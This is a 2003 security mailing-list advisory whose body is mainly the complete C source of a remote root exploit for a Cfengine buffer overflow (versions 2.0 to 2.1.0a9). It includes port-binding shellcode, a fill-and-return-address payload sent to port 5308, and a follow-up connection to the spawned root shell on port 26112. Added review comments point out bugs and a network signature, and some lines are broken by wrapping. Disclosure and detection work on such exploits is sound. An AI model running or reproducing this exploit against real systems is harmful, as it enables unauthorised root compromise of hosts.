[EXPL] Cfengine Remotely Exploitable Buffer Overflow (Improved Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 10/02/03
To: list@securiteam.com Date: 2 Oct 2003 13:59:45 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Cfengine Remotely Exploitable Buffer Overflow (Improved Exploit)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article,
<http://www.securiteam.com/unixfocus/5LP0P2KB5K.html> (Cfengine Remotely
Exploitable Buffer Overflow (net.c)), a remotely exploitable buffer
overflow in Cfengine allows remote attackers to make the program
execute arbitrary code.
The following is an improved exploit for that vulnerability.
DETAILS
Exploit:
/* Remote root exploit for cfengine-2.0/2.1.0a9 (stack-based overflow) by
Li0n7
*
* Vulnerability discovered by Nick Cleaton (nick[at]cleaton[dot]net)
*
* Contact me: Li0n7[at]voila[dot]fr
*
* Visit us: www.ioc.fr.st (for those who can speak French)
*
* My world: l7l.linux-fan.com
*
* Here's an example:
* ./exploit -h localhost -p 5308 -t 0
* [+] Building evil string to send (using ret = 0xbf7fec10)...
* [+] Connected to 127.0.0.1 on port 5308
* [+] Payload sent
* [+] Trying to connect to 127.0.0.1 on port 26112...
* [+] Let's rock on!
* Linux Li0n7 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
* uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
*/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
/* Port back_connection() dials after the request has been sent. */
#define BACK 26112
/* Default return address; -r overrides it, -t picks one from exp_os[]. */
#define RET 0xbf7fee04
/* Default target port (-p). */
#define PORT 5308
/* Exit status used on every fatal path. */
#define ERROR -1
/* Offset at which build() starts the run of return addresses. */
#define BUFFERSIZE 4096
/* Number of bytes set_connection() sends; build() allocates SIZE+1. */
#define SIZE 4136
/*
 * Payload bytes that build() copies verbatim into the request. The comment
 * on the declaration is the author's. back_connection() later dials BACK
 * (26112), so the listener these bytes open is presumably on that port --
 * that is not verified anywhere in this file.
 */
char shellcode[] = /* bighawk 78 bytes portbinding shellcode */
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";
/* One row of the exp_os[] table that -t selects from. */
struct os_ret_addr
{
int num; /* index shown by die() in the platform list */
char *plat; /* human-readable platform label */
long ret; /* return address handed to build() */
};
/*
 * Platform table indexed directly by the -t argument in main(). Only entry 0
 * is populated; the trailing NULL effectively initialises the `num` field of
 * a second, zeroed entry (it is not a pointer here). main() does not
 * bounds-check the -t index against this table.
 */
struct os_ret_addr exp_os[]=
{
{0,"slack 9.0",0xbf7fec10},
NULL
};
/*
 * Abort the process with ERROR unless the resolved host is non-zero and the
 * port lies within 1..65535. On valid input it simply returns.
 *
 * host: IPv4 address as returned by resolve_host(); 0 means "unresolved".
 * port: TCP port parsed from the command line.
 */
void
check_error(long host,int port)
{
    int port_in_range = (port >= 1 && port <= 65535);

    if (host == 0) {
        fprintf(stderr,"[-] Host address incorrect,exiting...\n");
        exit(ERROR);
    }
    if (!port_in_range) {
        fprintf(stderr,"[-] Port \'%i\' incorrect,exiting...\n",port);
        exit(ERROR);
    }
}
/*
 * build: allocate SIZE+1 bytes and lay out the request body.
 *
 * As written below: the buffer is filled with 0x90, its first 7 bytes are
 * overwritten with the literal "3133337", the shellcode bytes are copied so
 * that they end 1000 bytes before offset BUFFERSIZE, and from BUFFERSIZE on
 * `ret` is stored 30 times (120 bytes with a 4-byte long), then one NUL.
 *
 * ret:     value stored in the trailing run (from -r, -t or RET).
 * returns: the malloc'd buffer; the caller (main) never frees it.
 * exits:   with ERROR when malloc fails.
 *
 * Detection note: every request this produces begins with "3133337" and is
 * otherwise almost entirely 0x90 bytes -- a fixed on-wire signature.
 *
 * NOTE(review): the ret run starts at offset 4096 and ends at 4216 (further
 * with an 8-byte long), while only SIZE+1 = 4137 bytes were allocated, so the
 * loop writes past the end of its own heap buffer. The fprintf call below was
 * line-wrapped in transit and is not valid C exactly as shown.
 */
char
*build(long ret)
{
char *buffer,*ptr;
int i;
long *addr_ptr;
fprintf(stdout,"[+] Building evil string to send (using ret =
0x%x)...\n",ret);
buffer = (char *)malloc(SIZE+1);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
exit(ERROR);
}
ptr = buffer;
/* 0x90 fill of SIZE bytes; the byte at index SIZE is not written here. */
memset(ptr,0x90,SIZE);
/* Fixed marker at the very start of the request. */
memcpy(ptr,"3133337",7);
/* Position the shellcode so it ends 1000 bytes short of BUFFERSIZE. */
ptr += BUFFERSIZE-strlen(shellcode)-1000;
for(i=0;i<strlen(shellcode);i++)
*ptr++ = shellcode[i];
/* Skip the 1000-byte gap; ptr is now exactly at offset BUFFERSIZE. */
ptr += 1000;
addr_ptr = (long *)ptr;
/* i counts bytes in steps of 4, addr_ptr advances one long per step. */
for(i=0;i<120;i=i+4)
*(addr_ptr++) = ret;
ptr = (char *)addr_ptr;
*ptr = 0x0;
return buffer;
}
/*
 * back_connection: connect to host:BACK, send `command`, then relay data
 * between stdin and the socket with select() until an error occurs.
 *
 * host:    IPv4 address in network byte order (from resolve_host).
 * returns: ERROR when connect() fails. Otherwise the loop does not return
 *          normally: every other failure calls exit(), and the trailing
 *          `return 0` is unreachable.
 *
 * NOTE(review): only recv() == -1 is treated as "closed"; a return of 0
 * (orderly close) is not, so the loop presumably keeps printing an empty
 * buffer. The read() return value is ignored and strlen() is then applied to
 * sock_buf, which has no terminator if read() filled all 4096 bytes. The
 * "Connection closed" fprintf was line-wrapped in transit.
 */
int
back_connection(long host)
{
struct sockaddr_in s;
u_char sock_buf[4096];
fd_set fds;
int fd,size;
char *command="/bin/uname -a ; /usr/bin/id;\n";
fd = socket(AF_INET, SOCK_STREAM, 0);
if (fd < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
exit(ERROR);
}
s.sin_family = AF_INET;
s.sin_port = htons(BACK);
s.sin_addr.s_addr = host;
if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) ==
-1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
return ERROR;
}
fprintf(stdout, "[+] Let's rock on!\n");
/* Only a negative result is checked; a short send is not detected. */
size = send(fd, command, strlen(command), 0);
if(size < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
for (;;)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(fd, &fds);
/* nfds is hard-coded to 255 rather than fd+1. */
if (select(255, &fds, NULL, NULL, NULL) == -1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
/* Zeroed so that a partial recv() leaves a NUL-terminated string. */
memset(sock_buf, 0, sizeof(sock_buf));
if (FD_ISSET(fd, &fds))
{
if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)
{
fprintf(stderr, "[-] Connection closed by remote
host,exiting...\n");
close(fd);
exit(0);
}
fprintf(stderr, "%s", sock_buf);
}
if (FD_ISSET(0, &fds))
{
/* read() count ignored; strlen() relies on the memset above. */
read(0, sock_buf, sizeof(sock_buf));
write(fd, sock_buf, strlen(sock_buf));
}
}
return 0;
}
/*
 * set_connection: open a TCP connection to host:port, send exactly SIZE
 * bytes of `buffer`, wait two seconds, and close the socket.
 *
 * host:   IPv4 address in network byte order (from resolve_host).
 * port:   target port, already range-checked by check_error().
 * buffer: the SIZE+1-byte request produced by build().
 * exits:  with ERROR if socket(), connect() or send() fails; a short send
 *         (fewer than SIZE bytes) is not detected.
 *
 * Detection note: on the wire this is a single SIZE-byte write to the
 * service port that begins with "3133337" (see build()).
 *
 * NOTE(review): `hoste` is unused, and inet_ntoa() is handed
 * s.sin_addr.s_addr (an integer) where a struct in_addr is expected --
 * presumably tolerated only because <arpa/inet.h> is not included and the
 * call is implicitly declared. Both progress fprintf calls were line-wrapped
 * in transit and are not valid C exactly as shown.
 */
void
set_connection(long host,int port,char *buffer)
{
struct sockaddr_in s;
struct hostent * hoste;
int fd,size;
fd = socket(AF_INET,SOCK_STREAM,0);
if(fd < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
exit(ERROR);
}
s.sin_family = AF_INET;
s.sin_addr.s_addr = host;
s.sin_port = htons(port);
if(connect(fd,(struct sockaddr *)&s,sizeof(s)) == -1)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
fprintf(stdout,"[+] Connected to %s on port
%i\n",inet_ntoa(s.sin_addr.s_addr),port);
/* Fixed-length write of SIZE bytes regardless of the buffer's contents. */
size = send(fd,buffer,SIZE,0);
if(size < 0)
{
fprintf(stderr,"[-] %s\n",strerror(errno));
close(fd);
exit(ERROR);
}
fprintf(stdout,"[+] Payload sent\n[+] Trying to connect to %s on
port %i...\n",inet_ntoa(s.sin_addr.s_addr),BACK);
/* Pause before the caller dials BACK. */
sleep(2);
close(fd);
}
/*
 * Turn a dotted-quad string or a host name into an IPv4 address in network
 * byte order. Returns 0 when the name cannot be resolved.
 *
 * host_name: NUL-terminated name or numeric address (u_char in the original
 *            spelling; the type is identical).
 */
long resolve_host(unsigned char *host_name)
{
    struct in_addr parsed;

    parsed.s_addr = inet_addr((const char *)host_name);
    if (parsed.s_addr != INADDR_NONE) {
        /* Already numeric: no lookup needed. */
        return parsed.s_addr;
    }

    /* Not numeric: fall back to a name lookup; 0 signals failure. */
    struct hostent *entry = gethostbyname((const char *)host_name);
    if (entry == NULL) {
        return 0;
    }
    memcpy(&parsed.s_addr, entry->h_addr_list[0], entry->h_length);
    return parsed.s_addr;
}
/*
 * die: print the banner, usage text and platform list to stderr, then exit
 * with ERROR.
 *
 * argv: the program name (main passes argv[0]), used in the usage lines.
 *
 * NOTE(review): exp_os[0].ret is a long but is printed with %x, and the
 * banner shows the address in 0x... form while main() parses -r with atol(),
 * which reads decimal only. Several string literals below were line-wrapped
 * in transit and are not valid C exactly as shown.
 */
void
die(char *argv)
{
fprintf(stderr,"\tCfengine 2-2.1.0a9 remote root exploit by Li0n7
(http://www.ioc.fr.st)\n");
fprintf(stderr,"\t Vulnerability discovered by Nick Cleaton
(nick@cleaton.net)\n");
fprintf(stderr,"\t My world: http://www.l7l.linux-fan.com\n");
fprintf(stderr,"\t Contact me: Li0n7@voila.fr\n");
fprintf(stderr," Usage: %s -h <host> [-p <port>][-r <retaddr>][-t
<num>]\n",argv);
fprintf(stderr," Example: %s -h localhost -p 5308 -t 0\n\n",argv);
fprintf(stderr," Platforms supported are:\n");
/* Only entry 0 of exp_os[] is listed, matching the table's single row. */
fprintf(stderr," num: %i - %s -
0x%x\n",0,exp_os[0].plat,exp_os[0].ret);
exit(ERROR);
}
/*
 * main: parse -h/-p/-r/-t, validate them, build the request, send it with
 * set_connection(), then dial the target on BACK with back_connection().
 *
 *   -h <host>    resolved by resolve_host(); 0 means the lookup failed.
 *   -p <port>    atoi(); range-checked by check_error().
 *   -r <retaddr> atol() -- decimal only, so "0x..." input stops at the 'x'.
 *   -t <num>     index into exp_os[]; not bounds-checked (one entry exists).
 *
 * Fewer than 4 arguments or an unknown option prints usage via die(), which
 * exits. The buffer returned by build() is copied into a local array and
 * never freed; strncpy with SIZE+1 guarantees no terminator, which does not
 * matter here because set_connection() sends a fixed SIZE bytes.
 */
int
main(int argc,char *argv[])
{
int i, option, port = PORT;
long ret = RET,host = 0;
char * option_list = "h:p:r:t:", buffer[SIZE+1];
/* Silence getopt's own diagnostics; the '?' case reports instead. */
opterr = 0;
if (argc < 4) die(argv[0]);
while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'h':
host = resolve_host(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 'r':
ret = atol(optarg);
break;
case 't':
/* Index taken straight from the user; not checked against the table. */
ret = exp_os[atoi(optarg)].ret;
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
die(argv[0]);
}
check_error(host,port);
strncpy(buffer,build(ret),SIZE+1);
set_connection(host,port,buffer);
back_connection(host);
return 0;
}
/* A poil! */
ADDITIONAL INFORMATION
The information has been provided by <mailto:li0n7@voila.fr> li0n7.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.